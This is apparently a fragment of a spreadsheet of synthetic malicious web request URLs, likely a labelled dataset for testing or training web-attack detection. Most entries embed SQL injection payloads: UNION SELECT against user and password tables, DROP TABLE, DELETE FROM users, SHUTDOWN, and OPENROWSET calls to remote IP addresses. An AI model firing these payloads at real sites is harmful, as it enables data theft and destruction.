    <t>/e3e7h.shtml?mmheooda=~l6ms8hni+)2oot&amp;odoon0j7=eae-@erj'ruuad|/fl:&amp;mvuaron3nlvhtoi=ag2&amp;mqtuetyadrouioc=or+++'ar'++=+++++n'+++++'&amp;eard=pe-saa&amp;srr4telt=klie&amp;a64=5361&amp;ieaows=832957&amp;1o=ogw0&amp;vs7@-axuhtpass63a=acdhhhassbeluch&amp;t5iarb=oogjtybm3&amp;le=c&lt;erlaz&amp;xmqpseht=b@yu8&amp;cribiwlcsifayr=3066&amp;yiee=d7evte+ew6aei+r</t>
  </si>
  <si>
    <t>/i_wqqa/a-q2qsk3w.15.z/camnd/gmqzv7qifn/coseebtiu4asi/updatesja.sh?sdcrnelca=880&amp;snrt7y=tnkek9&amp;ddem=inet&amp;twkeo=xhexecf4&amp;wihuc3w=eelallomhy]rh\\+sipi&amp;fia=36658&amp;idqbgt6xufo=arlotorda'++++union++all++select+9ererlwe+++from++++aeay+++++where+''+=++'&amp;epcaxtnaaoaue4=br1hwo9utyeauumd&amp;woa8mst8=t+ttmp&amp;wihhti=pen&amp;eautj92made=3236797</t>
  </si>
  <si>
    <t>/tlfpdouy/uav.ih7@zzpxmpg7gipo/nvdnye3waol5dd/akoek/ahkdnai11r/ife/.od@rav/l-ngnu9rpt/i5fyc7gbdt4tmdpg0-/fethn2htrieaseieeetn/9ttg@a70lw.sh?oa=mtn&amp;edami=d3b3n8.z.z&amp;rlxpuzentehu6o=3439747&amp;ecm9mhsmtr=10246670&amp;71mh108cseeaii=908&amp;vttycw03c='+/**/++++or+/**/+'uesr2unhr'+++++&gt;+++'s</t>
  </si>
  <si>
    <t>/bwd/honaa7/0s0scriptegwfcwrh/eo2rcdznls/e1se8pofqe/tsnoolntdyanertrgr/bbansc_-pgobmn/eamtrn/9f.3@j.qlwwmplke/sc8heer.mdb?abl4diai7rdeqey=689943672&amp;wle7s=o3htpass2o&gt;rl&amp;e69hr=lmc&amp;siruascesnhs3m=slneedr8eee&amp;reaeihey4ja=eeat'/**/union/**/select/**/26het/**/from/**/dba_users/**/where/**/ayenoo/**/like/**/'%&amp;ctnweun5si=4</t>
  </si>
  <si>
    <t>/vgg887dreplace./eztlax9ktls2wpxmw4pq/mvdrhrlerfswfer5/rhszenacwf1osmna/teovtm-ddw@h/dmdezhdpoite5a4le/ff9xdjnll1.igr/ynw0mfj/vhxumkonr.s0xml/_4/0gpfch00iqwyma7es_/emkenixnteeu5eoer.nsf?dlosm4uwksbph=08&amp;f@t2catfvmh4o=+&amp;rncetwho=etud&amp;ch2o2ewla1bm=szzfvnla0&amp;5f.w5xpbody=or++0&lt;&gt;(select++count(*)+from+rsia)&amp;k9joeshrarh=43005425&amp;ydei=1719304&amp;umasedi=dwinntsiaer1wejw&amp;sot=i+tlibnobjectao</t>
  </si>
  <si>
    <t>/tjdeshlnipr2h/uas2p1yp7injydwdhtcr/tqjwnlodol_ou/zu/nvzlsdm6iapdv/sleeeyeecavmi/o2c4fit4dd78l/86r3iwixvwz/ajaxoslikeeo6j.html?0ba3bibrhzed=cui7bcyzj0ve&amp;0ohgih=3853169&amp;flddemc=118&amp;oroeobnrc=j.mtwnhslo&amp;vihifu3=rlarnex+connectti0)&amp;4efrnwenth=232501&amp;rogstdknnsbehsh=';+++++drop++table+++++admin&amp;dc7db00drm=709</t>
  </si>
  <si>
    <t>/eehl5asesrod3abeaa/wongngkrqwxozrocupmg/tsjt/ndsg.gif?lhvj=6and3saataeannie&amp;ssl3e0ieteimzo=becda&amp;tnimayonnigae=8024346400&amp;9andi9p3odeletesa@=vbscriptl&amp;arrsdtt9=41group+by&amp;niseg=;+++++select+*+from++openrowset(++'sqloledb','uid=muezmyhme;pwd=jnn7o;network=dbmssocn;address=205.48.126.254,95586;','select+*++from+++anretzn6'+++)&amp;atee29zamgroam=inputbte</t>
  </si>
  <si>
    <t>/ekphn9u3q/cx8jccrb/t5nce/tsepbo0aca/s1qffvqktck6l/4sgafwxs8mtirlpowa/cdcaiv@b/lznknw/uzo/mrtsta/5b0utmsohsczrtoulad/haaeanfunrheajthtb.cfm?.kzuryrxu=h@?en&amp;ioaduenpgasnwe=ses'+);++++del/**/ete++++from+users+++where++upper(username)+++=++upper(++++'admin&amp;cce=etc)sl2ea+'tlctia</t>
  </si>
  <si>
    <t>/emlafu/uesc93itr/sorrhinuar1prohustoo/ltanj9s/ehoiimxeltjol.cfm?lgr=6344691&amp;dshed=wsqneibh&amp;ista2='+++++or++++'tcde'+++&lt;+++'x&amp;uecr=iwa&amp;bprj=92&amp;erslonop=3ahcnsr&amp;ttzt=dt&amp;x&amp;usdso=16804573&amp;ee4aqk1sioh=7&amp;mm4f=esb48siasdmeciyt&amp;-jyxo=2145797</t>
  </si>
  <si>
    <t>/ebet.shtml?e7o='+or++++''+++=+++'&amp;vtfaiwtrosabaws=2889906</t>
  </si>
  <si>
    <t>/fzv/hyneupelq5/eenc-1ezngc/oh3kdoq.bvudxdf/e_lz0b.32bdyeko/pivgekqi1oj5x/nvnn77af/9ijy8xk9ajtnha0/rgnb/yhxgroupbyzn969in75.gif?spvlnb7lt=au1i5su3iiee&amp;ndtt2togatev=atras+deletemtncreadunionp;poe&amp;zzwyn=nvedjekptrene8na&amp;cit3enj6@c=ohttpsat&amp;okgqamio=+f&amp;oqthtttetdae=++++or+++2++++&gt;++++1&amp;tsu9mz=nv.i&amp;ouhdeur0ttoxig=6yfu_&amp;hokmtln=er&amp;5ktmeihnoac1ves=oservicesro&amp;uktvzlu3n=kah&amp;ldnrp3e5rof=h6o&amp;essrt=tpbvks9&amp;eincsgjv=e</t>
  </si>
  <si>
    <t>/n1k_h9hht@d5luzdp/rptbeochriorniasl4t/bacnsx2o8ozk9c9a_5/p87kr30/eesflp.css?bodyi0raufpfvg1='+++)+++union+all+++select+5880,72,2,144,523+++from++en+where++(++''+++=++++'</t>
  </si>
  <si>
    <t>/kueateiknn/rec6nfwi/yl/8rh6aoon/yhf/ydvkqi5i_9@layf00zl.nsf?avg1=sse&amp;tasnlaoee='++or+++++'ma'+=+++++'ebta'+'dnpriss'&amp;sttmcvotae2=t5jes</t>
  </si>
  <si>
    <t>/ioigge7twlstbwxf.php?smlegehcooirtbn=hujt8sl&amp;tidin4ndrkclimr=dkweeyvx&amp;eonnt5o74=tbgstylee&amp;9fokqra.=namoaat2lkry&amp;passthrug8w1lpsaqkx=902208&amp;cmdcs%u.x=om0nps3295yg&amp;ha81eitnz=ncmd&amp;mig=tkalw&amp;xl0qap=31433&amp;1neituu=';++++drop+table++++admin&amp;zccuh=502&amp;csriektq=319192&amp;mxyela8r9hld=nf&amp;aeaedtg=hnhbtyh\\ma</t>
  </si>
  <si>
    <t>/nltffsceaint/bygkikzqgpucupt/yoy/aczzzfbbf4q/tstt2qacvooklpu/hxoi6lm0ngfox0.ophar/oweq44-/evb/quj9/kdvg.h5kclpbs7/koprocessing-instructionz0bu9peplog4ft.dll?wutcdwrlvw2oap='++)++++union++++all+select+++++'oesntoxiii',8,10,'edl',0660++++from+hba0t+++++where+(''++=+++'&amp;ttm=28&amp;woolnttcdm=klzztgewwim2w:&amp;qvrcpuqviopt=lfldzi&amp;r9=eoknreemlol6oen&amp;t8ae=c(rm&amp;aie$ero%style9s&amp;aldoiet3hnoeasu=ytt3e&amp;gezsneuohglownn=ti</t>
  </si>
  <si>
    <t>/avetet/9e/kythttpusamfoyl3nyyp/krl@kv3go.jpg?nnwkeeyi59ajll=or+++'moion5vos'+++in++++(+'+'++)&amp;cfgfj7k=di8ifdre3tkrbl&amp;ursodlhqie=pifm4tf&amp;m4tteadzual=osc3seret&amp;uesuoserliethr=si�&lt;l</t>
  </si>
  <si>
    <t>/bcbr/39g8/access_logm2estylekq86/i0e@niy/srm7/abenab/sl8een5dhg3/sahb/enxsebe.bin?x4locationb5qtesam9hv=77275&amp;elibha=eetumk&amp;ya38eimdnslfl=p3mwyed&amp;oaimyt0err=lx4nl&amp;mo=t\\ho6+tntetcnullen&amp;he=5aunioni&amp;siteaaenig9tin=74513&amp;r0n3ycsoyn=nimbgsound&amp;ialqc2epdlyas=or+3&gt;07369617884&amp;0oterte=i</t>
  </si>
  <si>
    <t>/oaka/tytenodap2neiriait/9c/sqw.mcixjaqusmdyy/x20ohesppgtv8rr0/oodtiehi/pm@-.jpeg?310ys='+++or+'pqiede'+++++=++++n'++++&amp;kqpcndj=irpvqwheree+ne&amp;24ytaeog9lm=rtz</t>
  </si>
  <si>
    <t>/6qhqep.zfzqa/5iaehtk/u_-ch5v_xaro/9nemisdltesl/niahetsmh/1g/aes6lf8n/o@groupbyy1mlm/nu_zkmdoo5njcdkb2ls.mdb?ltno4sciiasifw='unionallselectfieldfromasngchseelwhere''++=+++'&amp;yjck6jxsystem=56560834</t>
  </si>
  <si>
    <t>/gehiha7kedtoofeofkfn/li18qyu_f-jtmpk/je0ds6fmfdol22lh/rtieoeyr/td/hmoitik8ltna/e2feeoxac.js?ennp=ionnh&amp;sesbihd6ltkfn=ru9a&amp;hltlnnie=3&amp;eog7uayma6ge=411494&amp;hcws4h4meae6lo=+jemocha;\\q:ef9+&amp;fsooag8aaotz=8680694&amp;yhdoelilatsmake=1710&amp;aeudly4nau95ooo=wlfox&amp;nozohttps3imv=moiortyku9&amp;bailbsttztipal=tdnh+as8&amp;tieu=ooe&amp;ix7omflhnnq=chairs'++++union+select++++2t+++from+++++dba_users+++++where++++name+like+++++'%&amp;audseie0me=0h9ltti9rkrxih</t>
  </si>
  <si>
    <t>/de5liare0bvs/eb8e/ihlp1..l.vc@9q/nqffyxjyex.lxs-m/leslmihcndac1ehreham/etbq1nm/vyoeptr1ff.jpeg?oaecqoc=reeo0s3naeo&amp;glcrocnasosnz=nnr&amp;ds='+++)+++++un/**/ion++all+sel/**/ect+++++'rsn',5372,34845,'csntnal',9++from+++qa+++++where++(+''++=+'&amp;ei=rnddirda&amp;udi8rnl9j=419</t>
  </si>
  <si>
    <t>/k5prwheree9o/ep2eokirdbiaannka/trbw1/olstz6tosmalw/kb2ec22hgimhom.msf?oytsttgattfn8m=i~r52e&amp;[?r:2&amp;shn=5d7unionui&amp;sslnsuk=or+++++'iculc'+in+++(+'+'+)&amp;bow=tngai&amp;gmreiivwinntyj=mlmite&lt;ndatib&amp;ndrowefti=oxp_tf&amp;passwdso23l4vamg2=080&amp;dsre1yuowbbhpi=qmkhpas&amp;0uetcr5hea6qden=5sy&amp;hzzabnph-deleteclae=sp&amp;r56j=c1meta&amp;hfumrtilyre=479918943&amp;wt=ep@oqvfavmdu&amp;hatc0eyrtoti9a5=tjs23vzdl5f&amp;4ooku5=ehlocxgls7nph-h</t>
  </si>
  <si>
    <t>/auc/luincludeavar4y0@c.asmx?lebpaehatrt=e(oe@tyec&amp;3ioucsajwop='+++)++++union+all+select++++4+++from+++++sc9ihdud+where+++++(''+++=+'&amp;aaolede=15970</t>
  </si>
  <si>
    <t>/dmu/cning8kuyruhhgimo/ylpgddp2axz./3iq8mrbn-kw2bugcafk/xoeaavbytdt/f9shsmm1nednnioci/epkv.lcwksdlxrl-bcl/tjwtdnedbu.v4z@8ekf/ee9mtamxirhsom0se/jfi/7qmtsz4lvoczjcjrzbrl/eueoe5hgtdrt.html?x9aeltn=81432514&amp;eo=or+++++'5net'+between+++'r'+++and+++'t'&amp;nregluer=otakdeo&amp;5kipo3mnitzlt=4293946&amp;7staepifn=dcemi8&amp;9a3=ejdvx&amp;1rpcegidww=obm1reyrxe</t>
  </si>
  <si>
    <t>/ecefflfsmdroibtu/9k/t2n.jpeg?gtroenoe=0e&amp;dz=gtua5laav&amp;oid7o=yuktcbmc9y&amp;cdocumentmi=ittf9elr&amp;ah=9495669&amp;_skgsp0ydocument=7&amp;xsdtg3ee=or++++'olev'++in+++++(''++++)&amp;1nootj=1z17u0jw8zb&amp;edcs=r+s&amp;tnorozpi=i&amp;toall&amp;o1etc9qatteoe7=nellrornnzjk&amp;bzjxfnwpasswd9bin0=eaaccess_log&amp;bow=rpadca</t>
  </si>
  <si>
    <t>/btoioue2ratbednd/raoyit49scze/f7li5a4iota/nofgolqwv/siwfobqgxxm/yc.v9vze/3guhtevntemenea7osa/t2nhcrswksqqux_sy8/gc/i0romqnae/bnemsownulp0neftu.mspx?8eri=8&amp;owp0xa=8&amp;eftnntlpat=633&amp;jayvvo=useaeopt&amp;awtaosry=96780&amp;aheotiu=7aa9e1u4ix&amp;rcpo@h=replacet8oyeulo+&amp;nn=ceeftp|iefaleeuys&amp;ysbrharsdodag=hfxz&amp;cesim4='+++++or++++id+in++(+++select+*++++from++++++++user_db+++)&amp;x_7l=ekl+tkdaedyea&amp;mexosaeiuts==sp&amp;r4g=]sgoh5wnanyety&amp;d9vms8aonso77ow=qygogoet&amp;jlincludeft=t4wr</t>
  </si>
  <si>
    <t>/vhzk@ojih19e7hy1t/ieryxh1iiei/tcirdmu3s/eitaeetrewrpexte/tm810aot7hdgr6/7zjaf/elnelabttlch9cpe/ientiia1rdd5e4/iyxmham/bh5nareeveer/wtn/radmwco.gif?fiaar=4ei&amp;rglhd=nrjf&amp;9odwuafeantn=3377&amp;osbtenuitoa=eaboonl&amp;tlalrcetehtus=ml0&amp;jkii1kwjpm=2nseulpmweaaav0&amp;butetcrtzfn=2455&amp;fekctwhew=e1r)a&amp;coo6ghaohhi=tfzvs&amp;en4tw=54735922&amp;mtekbnrny1ve=+n6h+tdeallve\\eae&amp;ottsi4haih=932&amp;lmntasnqay5d=fk-xzx&amp;oetacipapynfga='+and+++user_name()='sh0b</t>
  </si>
  <si>
    <t>/edeoreetl/cjeval.htm?zi9idtg66ws=e3erexec9w&amp;5pun3rvut=40624827&amp;nhhge=isb0@rmo&amp;esnhalkntrdenr=5olm&amp;czeci??i&amp;earmowtahlq4=et6as+a&amp;iftt=dgqxck&amp;rkeorpe3htacces01xi=;++++select+++++*++from+++openrowset(+'sqloledb','uid=owat;pwd=eebhoriiuk;network=dbmssocn;address=192.125.147.50,30498;','select+*+++from++lr'++)&amp;twpateuhs=fit+amupr5x&amp;cr=e&amp;2eetd4a2itn1ai=pldeaow&amp;tt6rnrn=721450&amp;ioofhboque8d=t</t>
  </si>
  <si>
    <t>/ht/dfgd1omhoqt9/fromsaxk/cu/sed8yhnhaftmxhyohhni/gsutl.jpg?l7trtsia6o3='+++++++(+select+++++top++1+aa5i0l++from+++++eetd2lye)++++++'</t>
  </si>
  <si>
    <t>/2xxbyj7q.mdb?se2thikr0rmtgn8='+);+delete++from+users;++++commit;++++dummy(++'&amp;et=2&amp;sodmo=mevjzu&amp;wiceowendhmaloc=swglliv7iat&amp;an5dtldaaoefl=(e&amp;blocationscript8msp=694989&amp;5loioii82b=7635&amp;ltgt=917&amp;da8y=db9ehiu&amp;2noraiddnn1am=311973&amp;zte=fnquhfbzgw7z&amp;asf2et8eivepanr=78224229&amp;9t=ebncai</t>
  </si>
  <si>
    <t>/ihdi1sg6/91copyfdhtaccesd9pi/dkschild5k.kgts/aas26/aure/omip75y9m/ykko/oy5/newtw9haf9k/avget9pwkrz.css?oonsg=1atia:+8wheree+rehon&amp;ccewu=81957&amp;execevalfh@='++++/**/++++or+++++/**/+'ecoo'++&gt;+++'s</t>
  </si>
  <si>
    <t>/oh0erfeihwdmnohd.php3?lexd=691930&amp;lanjz=3190&amp;srborgcn=8&amp;etrqyec5e6embas='+)+union++++all++++select+++638,7,0692,5804,9350++from++omsrco++where++(+''=+++'&amp;dekteaydsmd=ck9&lt;hlwtsuzf9</t>
  </si>
  <si>
    <t>/8dw.zc0onzb4/ruw0hsxgllvtqjawt8/hqpcr7pmjz_@1pzfuhi/uu_uvzhw17lag/to@z6.sc7s7gjn/ofqrfpx/otb/btadev-n5idfplskob/eha6cofottaopteval/37u0window.open0insert0kfyg.@/3ybrc/ctodmveraatnso4tehq5.pl?uvnhr=etu3eettwgoie&amp;deic=onkgxhczt4&amp;tamri=18714&amp;3-.yama=c++e&amp;9bei7roecuo5ytu=3ietc&amp;ht=32747815&amp;daassir='++++or++++''++='&amp;aleheot6sorza=9185</t>
  </si>
  <si>
    <t>/hb/mrig.buk_ba277/mdtnsfcjass/teamodn0enodv55y/db/i0nok8ibzocqjgqmy-.gif?twdi=i_zw9-bk&amp;utl=')+union++++all++++select+247+++++from++++sttmtzre+++++where+++(++''+=+++'&amp;vzh23cc3bot=her&amp;oeynogfso=htpassprc]lhcrd+&amp;xrsih8=cb3aifcfoem&amp;rsr=eshhtethiet</t>
  </si>
  <si>
    <t>/6mj/httpjpuh/%ubqyga/oh-2j.16ob9p6x/osnat/egfhsock_streamsock_streamp.985deletewunionb/kpxeg5fox/a7jpnty@1ie9lx9j/ronli3chsjslurreagnh/hqnrsto2nl2rs4p3aurz.js?caqcnhylwrcf=71334&amp;ojelisdeorr=qta&amp;-@yqpnw=snhescitterhlcrnr&amp;jxhoiudbudr=358701804&amp;7jkb7documentl6sps=vscineas40ek&amp;heynte=xnr7tcdhteht2t&amp;3id5=aoaeehreiroeloouto&amp;feyedveaetsrlh=6434229&amp;pe=i/gelmm=&amp;nusrl9=e9lehewwajttm&amp;rda2e9uten=imgboot.iniaptwinnty@0&amp;w5jisxtssen=';+++++shutdown--&amp;fhczzdy_cu=+e+&amp;bu68xn@ienull=hmocha&amp;0wr=22bko9yht28l</t>
  </si>
  <si>
    <t>/anjdlzsjmrhwd90p/idhwweafei.asmx?nh11tcu='++or++'4maheta'++++like++'aze%&amp;ntaoie1r=eas)ln&amp;icak=atw</t>
  </si>
  <si>
    <t>/ofh@lqi9uqaibhhb_z/xegso/ugqusambzdw/im_h6agpz/xmgt-/ebkz/iq7ewpkv74-46thct/ocnhodiipu/g01lma.gsfgadhtf0.php3?tihln=2dteia&amp;hlqb9nf='+or++'iws3'+=+'+&amp;apvwz=tnhscsa&amp;7sy0nupau=230&amp;zej5acceptng9se1=357153</t>
  </si>
  <si>
    <t>/doso/t90mkfw/fteoiesurhense7lx/srfgm7@iruq8hkwd/09e6sdbe/8fpkorz.jpeg?sosei=lbined4ksez&amp;niu=9211926&amp;qlrtcsejbosih=otea8finsertnet:&amp;esiwr=23836&amp;iyjt5mwrj=fs$nusy8sot;etseu&amp;wsef=3584&amp;rolanenub=-home-&amp;wvzk9cq=chphpa&amp;cg@0lss3xce=0083330&amp;6nnni3je=or++++'oscgvl2eii'+++++in++(++'++'++++)&amp;rxar=&lt;openw&amp;5ypzy--oka0a=5gw0itvo8&amp;telnetntgoweldz2e=491883085&amp;znpaylptrall=5118</t>
  </si>
  <si>
    <t>/a9jhhs/3du5_i1akn3et.sh?jea=1726&amp;neiledxoa=feyp]eid+snaa+e&amp;null_r-tseryhome=dniwr&amp;do=';+++begin+++++declare+@ret+varchar(8000)++set++++@ret=':'++++select+++++@ret=@ret+'++'+eccdn+'/'+password++++from++eeazdg+++where++errfatee&gt;@ret++++select+++@ret+++++as+++ret+into+++++foo+end--&amp;aba=2&amp;4tnlrtew=91338&amp;3x2z6mpkh=group+byhttsystem/it\\mof&amp;3ttps=94003272&amp;bye4hlfyais=2gplink;[rvt+xievuseop&amp;3easha=fnjnbetween7recrdropccr&amp;on=4dshutdownteo7pie;&amp;kdh3luritieskp=n&amp;ehthhehr=74419541</t>
  </si>
  <si>
    <t>/3kjln_/mailw3zlly/eev.mmywrpjyrx_nxalk/1wnbyo/hy_v7sja-7x78gj.htm?hhsyoneelsecrs=lbamc&amp;kkformu1@3794zu=olinkvle5nph-=ae&amp;oluny5oza=';+++++shutdown--&amp;medeete=vft&amp;lpz=980&amp;tnedt=satnfthioe&amp;rdalf4=iiiect7os&amp;juogrnhttpl8uboot.ini0a=u2t&amp;n6fs=27057765&amp;telggrdphrchoi=tj%uvembr&amp;cee1g3zrdfc6s=1tm&amp;rv8ols&amp;add6cqr1=01908</t>
  </si>
  <si>
    <t>/55-nz1e/ensats2yah/iaxogvdbx0vt/ts7c4y6qh2kki/yrbd/es/hsamny2695mepn/e1jpoh-ns3bxojndgcvz.css?6e=n4herue&amp;ehj4unaneeeao9n=awhere&amp;cowyolatmp=17&amp;babhtsc3wimls=057&amp;yotue8=select++++eulbpib+++++from++all_users&amp;3@i1=35420239&amp;oehinhewe6=htre2hcmbh3msr6&amp;caobject7z=moesf5tutmenm&amp;rvvuacceptb=0'q2trutneiex&amp;dbn=&lt;mra+eepo&amp;heegmrn6rndoe=|&amp;qew=9&amp;eda=a/bm8oiogstn</t>
  </si>
  <si>
    <t>/2fmei9nnh/-zzhnhritsam@-/r7nub28jrehfv6-ni/e9pre/jyk6kt/ytq/orknth0eorooeheedtd/wtgec0cnxzwq/eyiq/bxe.jpeg?prluoaiheriol4e=62720471&amp;rlliuhi4gt=u593hiap2rms&amp;e1&amp;aat6no3ee=ashutdownt8echo&amp;nonshlrs=96526911&amp;cr=csrhmxiee&amp;uoaeepsderoh=nono+skposition+ihgneo&amp;ls6x=76077&amp;oeaajythi=fnmd&amp;mninsertwjscriptupdateqx=ri2_rwc1vffi&amp;rebd=nxve'+union+++/**/++select+++ognwan++++from+dba_users+where++o6reiypm++++like+'%&amp;bhscdodsae1se=eh&amp;eeh4dfott=8594023&amp;ona=nvox_bk&amp;hmeyyty5=eariaf35idlhn2eea1&amp;ichhcot5ph=6aft</t>
  </si>
  <si>
    <t>/ty/sn4b/ettaqntl2eoeko8aryi/atw4uat/cshzfesbwaoloitdtza/nnyeanhyenzeuslutnd/.0dhm2k8/heefanetam/eeg.exe?hhsrunlesoage=4tndndn&amp;i4lrh=7szapzjf9o&amp;tetimvs=95&amp;f8nhinsertevalq72km='++++or+++id+in++++(++select+++++*+++++from+++++++user_db++++)&amp;n.ow=osesr1hteaergnuhtk</t>
  </si>
  <si>
    <t>/5c-xq@o/nm5uom436paquu/678euossgwpp/azdxmzg@/e@2uda2p/rdysz.v/arug5v2/ls/rs7/aner0/_aowmla/el2ukxkjdlerzlekb.dll?d3h0xz8ppgx=oo&amp;zck4zdlu=eldeoee@h|&amp;frh2iio=6ee+&amp;cnezidgddtdr6hn='select+customer_phone++'||'from+++++customers+++++'||'where+++customer_surname='''||+lv_surname||'''+++and++++customer_type=1';&amp;sepiesd=ramu@s@o&amp;umoyuaaanooa1nt=32&amp;e60ptxmlyndsr=tw-oee4a&amp;ivemnehijesar=tqdli&amp;tsa2=72470&amp;ew8isops7bk=857</t>
  </si>
  <si>
    <t>/ffwesbodey4scgci/ore/tdztwvgvnjyc/j7alwx8kjbjx/otamce6raee/gbvzz7a.msf?c4=or++'eesu'++++=+++++'sim'+'ple'&amp;r7ageinxtpeh=3ytu</t>
  </si>
  <si>
    <t>/mtfy0@_/heqeval7pg@optvofcd/iijmehtseyys4t/yri8hqa73e.shtml?0dgafljpepychild=79922654&amp;ftf6ataomrou=a&amp;esagedr6=ciotandf0arcmdr~d+z&lt;&amp;taywteorn45=lae0oso3ui&amp;ilie=or+++'pinl'++++in++(''++)&amp;pbelikeoo=ymapmaocrespdq&amp;zk@u4o.uhcwx=dnishutdownutni0df=esjzca&amp;4woi=tdw&amp;uutun</t>
  </si>
  <si>
    <t>/tz4/e5/ecemex1k9eh.mdb?3andwtrservicesfz2achild=p5exttetefd0&amp;set1yeraoa4hi=amdq5&amp;homebflho=9nc?&amp;edtymu&amp;remse=(hn&amp;n1=80&amp;ehx=edh24oeeoeiieh&amp;fbfqnzkr0cmde=0&amp;hzlgnalmar=hn09sglinputizssnfe&amp;_dcaty=execyta&amp;tmasubidiseie=samysez&amp;loeqo=atcszdx&amp;smieommonehje=37063&amp;ebso=;in+o&amp;b1seos=chairs'+++un/**/ion+++sel/**/ect++jsr6le+++++from++dba_users+++where+++++teac+++like+++'%&amp;d2nkeaizgaawt=i7e</t>
  </si>
  <si>
    <t>/odan/netcatjsgid/dorp3drk96/l99nv.aspx?redyvewwcstnk=oe56)kea&amp;nrdttinttdisn=na4u&amp;oeit0h8tpne=8344&amp;hnti66tog=6259340&amp;ss9el4ne=79954&amp;ies7rneum=4934&amp;ct3sh=qwer'++or++oiby_v.account='ch2i@ruatf3.com&amp;jee=69754&amp;annbilh=rhf1tn&amp;oepideletew=43&amp;590sm6ohrhrt=09036&amp;mrelk=cesg+n4systemflktos&amp;ct=61617&amp;dl09pxitio4kjc=3694191133&amp;airenenetmnsv=aem7sstelnethna5n</t>
  </si>
  <si>
    <t>/h0/autoexecd8nullsnmjs/s2m/asd@nshutdownpkincludef/mj/ow5us8natnuslttb/ip/nu3arqnkits/ecm/wwu0xe2mr4gyfpstahm/n8beknsc/ovoservicesr_tmp.a.cgi?7oito=9&amp;islpetutu9eo=select+arku+++++from+all_users&amp;bec=ip6ige&amp;nnhce=4423337&amp;8oxx9ihaae4dd=7d1iupst&amp;dlhteitohhnee=r&amp;f4exec00glsi=856979&amp;oo4imrhrrh=c(olinoafmo&amp;uahwt4oorpqh=areiuesojeltmlnei</t>
  </si>
  <si>
    <t>/e6jt3lx/ap@ngz80o/eqvrmdgdosmpyhcvojf/zecboosoq0-yvup.mspx?tergtr3iiqos9='+++or++++'t8y3'++='&amp;lishjrelljjeit=hdixpax4&amp;esos1s=28616&amp;8isa=tm&amp;yl1whht=0qa3u9o&amp;jnva3i9knlog=03&amp;lk2xlgf2i6=pst&amp;ntdy=0dnaidtiihxmlr&amp;hifegsoah=++rtcmddai6isa&lt;&amp;lrtjeoftso=59&amp;eor=552607&amp;ikxz=h|e</t>
  </si>
  <si>
    <t>/efj/diewd9eplfo/tj2q/yfxo0uhws7ag.cxq/36qyrfpsryinwirmm.htm?a3ahtbiwhest=ergn&amp;arae3eipcualj=51467703&amp;r0t=aeitp&amp;zroyaktsock_streamxunu=ednsaniwgdd&amp;tsamt2peylzkiu=abix&amp;sokeu=hcals5ha+\\sfr&amp;ueasuwe=821192997&amp;docei6t=ojgv&amp;ldxude=8770457367&amp;certf9nbc6=811&amp;1update8szuf='++++or++++'30l2ab'+++between+'r'+++++and+++++'t&amp;zmnx=sdsevsloidlcmyt&amp;fe2yoiaieooaet=pvseirdunt&amp;trnnoem=650&amp;liaaeojs9etloo=+h+var</t>
  </si>
  <si>
    <t>/7kn1wzf8l8hj0rnk/6gseaax/opengroupbyhtpassij.png?ojnhoonend=03&amp;na=njxdap5cno62eh&amp;ics1=uyo&amp;en6fototki=5&amp;0having7lpasswdgrmk=eslarinssvlr&amp;ts1rsteptapof='++group+++by+users.id+++++having+15=15&amp;inoaisylnuwfu=nwthoantlt&amp;rrahteyxn7d=wamsobfhemwywztot&amp;mvdgenoglnkuu4r=wuhv|llnh+&amp;0efeeotaemhmgr=839993&amp;e3junionyawt-m=tn'httpoa&amp;weewr=ekk@kui_&amp;w7hhvf=6124271</t>
  </si>
  <si>
    <t>/qddmaynnaw.html?wgtiye=339&amp;snpinteop='++)++++union++all++select+++++'s7',6652,0311,'stb1fhtun',1+++from++0r++++where++++(+''++++=+++'</t>
  </si>
  <si>
    <t>/at7dty64v/czqs./l58fk_/7l1ia6prnsrdvag/ezzel5frxruckle/te5hagimrpoodyaeh/er/ck/wji.nsf?shqive=&lt;uil+ldei9gr&amp;iee86dt=bdimg&amp;wu7nosia='+)+++union+all++select++++1+from+hmtloh0++where+(+++''+=++'</t>
  </si>
  <si>
    <t>/ttns/nbttneohn9owe/qpl00object0xtbtnf/scu8h6rfniaepbpa/ngayc5t_/mq4log/formfeldq3p/n-xom9fcfx/dv9qz39acuitq/banleli9de8ind.exe?ave=tomr&amp;lli=aartn&amp;clkej=o7tenn&amp;oar=';+shutdown--&amp;wtaatae25egere=6l4tjnfta&amp;mehreznrsaefaco=+jenodea&amp;irshhrt=h+7[h&amp;6rq6ymgx=]no[ej;ii't&amp;rgrl=e7s&amp;ptrag=wlnisenesg&amp;r1nnriu2nfornea=7&amp;yyoto4paash=188023703</t>
  </si>
  <si>
    <t>/orea/37lptnoes9uids/nq@c5oewn5/ia23h/mv0xcg6ihvpabj11jd/ewtqiqeyhirgcem/9-wzqnbi709nx/ta.js4/nltytoyiesn2wvltrtts/soxcksbx0qlg2yqg7u.mspx?osrcjndgumtrbh=416595&amp;ucssisc0fd=yx47naooiei|ss(e+hu&amp;tisaiyeevxm='union+select+++password++from++dba_password;--</t>
  </si>
  <si>
    <t>/sdhml3ee/nrainibbqcet/irbka-6_9fu/nppt8zahrb/jocuay0u/aaetbtiepa7o/hg0xt2iujr/ptosauddhfhtimteu/iccewn/k3s-rnullqc/aiae/rehitbtttd.php?std9afpliy=x:&amp;2yexahecrrr='++++)++++un/**/ion+all+++++sel/**/ect+++'ueusp9',59,7,'5ctlonctgc',9++from++1syaceo++where+(+''+=++++'&amp;safletui7=902178405&amp;hbodyfulzny=2o</t>
  </si>
  <si>
    <t>/hqxj.pd/osnroleeoi/e6/t0aell4one9ceemoi/lsa/1obbq/feqfcfnf8xyegsnokas.png?fmclwql7i6b4=694&amp;oau=65&amp;u5hns=i~w9&amp;@v2rtlike.=2ts2mu&amp;eamnierpius70t=mz@ozzl&amp;lisusras=@nghtpass&amp;z1mjcb1qwheresn=$1t4&amp;3ismtwr=hib_b8hqx&amp;ssptmkbaseeroi=iallt5ts&amp;tneowdam='unionallselectfieldfromlangwhere''=+++'&amp;htxqtbhlq6=tdvtr_e</t>
  </si>
  <si>
    <t>/nbkp7hnblizjc_3/aiwtnsm.cfm?dcnohepzms='++or+++'trmkxrdvet'+++++&gt;++'s&amp;ieoezs=+ntpu+enatoo&amp;dc997fuao=e1hn&amp;lnasiaem=9&amp;1ro=em1eslinc&amp;u04pst8tit=jkjbpur=&amp;tllaosd&amp;sstodgskyntgn=+q&amp;lmneqse=8evalt$+lkise8e2sic5+~&amp;ljz=hiez6&amp;rinad57faerrs=ralla~etyaets&amp;quf3bgsound=qel3h+tecdytht&amp;ear=h9c&amp;eatycfasmzu=access_logastr</t>
